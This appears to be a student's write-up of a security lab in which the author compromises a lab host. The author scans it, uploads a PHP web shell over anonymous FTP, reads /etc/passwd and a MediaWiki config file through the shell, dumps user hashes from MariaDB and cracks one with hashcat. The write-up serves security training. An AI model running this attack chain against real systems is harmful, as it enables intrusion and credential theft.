Lab 7.1 - Exploiting pippin.shire.org (10.0.5.25)

Recon and Service Enumeration

nmap 10.0.5.25 -p 1-6000 -sV

---

Here is the nmap I used to find remote code execution

sudo nmap -Pn -sV -p 21 --script=ftp-anon 10.0.5.25

FTP

• To upload a file I used the following once logged in

ftp -i 10.0.5.25 (anonymous/no password)
ftp> cd upload
ftp> put testFile.txt
ftp> ls
exit

• Using the simple-backdoor.php we found at the beginning of the lab and injecting it into ftp allows us to learn more through using the chrome http://10.0.5.25/upload/testFile.php?cmd=cat+/etc/passwd

• From there I used the Local Settings PHP to curl and find user information to get past ssh curl http://10.0.5.25/upload/testFile.php?cmd=cat+/var/www/html/localSettings.php > local_settings_php.txt

Deliverable 8 onwards

• I started getting confused here so I am just going to put the steps here to record progress
• Deliverable 8. Enumerate this internal data source to determine where and in what fields useful data might exist. You very likely learned about this system in SYS255,265 and SEC260. Break out your old notes and get on with it. Describe what you found. In the end, you are looking for a new identity and a credential.

mysql -u root -p
MariaDB> show databases;
MariaDB> use mediawiki;
MariaDB> show tables;
MariaDB> describe user;
MariaDB> select user_name, user_password from user;

• From here, I copied and pasted the hash and then deleted Pippin:pbkdf2: from the beginning as well as :64: to then run a hashcat in humpty

cat /usr/share/wordlists/rockyou.txt | grep "\bp" > rockyou_p.txt the p is used for the hint
hashcat -m 12100 modified_hash.txt -o cracked_modified_hash.txt -w 4 -a 0 rockyou_p.txt

• Password was cracked and sent to loot

Reflection

This lab was very tricky, I started to get a little scrambled in trying to figure out stuff which is why I broke down my steps for deliverable 8 onwards. Recon appears to be getting in my head as I remember what to do!